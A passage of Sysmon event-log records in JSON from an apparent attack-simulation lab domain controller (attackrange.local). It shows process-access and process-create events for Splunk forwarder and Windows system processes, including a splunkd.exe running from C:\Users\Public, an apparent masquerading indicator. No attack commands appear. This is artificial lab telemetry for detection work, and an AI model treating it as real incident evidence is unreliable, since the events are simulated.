Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4375,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:01.488\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:01.488","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4376,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:01.880\r\nProcessGuid: {E2A3D6B1-114D-5F25-0000-0010EC1D0600}\r\nProcessId: 2548\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:53:01.880","ProcessGuid":"{E2A3D6B1-114D-5F25-0000-0010EC1D0600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:53:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4377,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:01.879\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-114D-5F25-0000-0010EC1D0600}\r\nTargetProcessId: 2548\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:01.879","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-114D-5F25-0000-0010EC1D0600}","TargetProcessId":"2548","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4378,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:01.879\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-114D-5F25-0000-0010EC1D0600}\r\nTargetProcessId: 2548\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:01.879","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-114D-5F25-0000-0010EC1D0600}","TargetProcessId":"2548","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:53:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4379,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:01.879\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:01.879","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4380,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:01.879\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:01.879","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4381,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:01.879\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:01.879","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4382,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:01.879\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:01.879","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
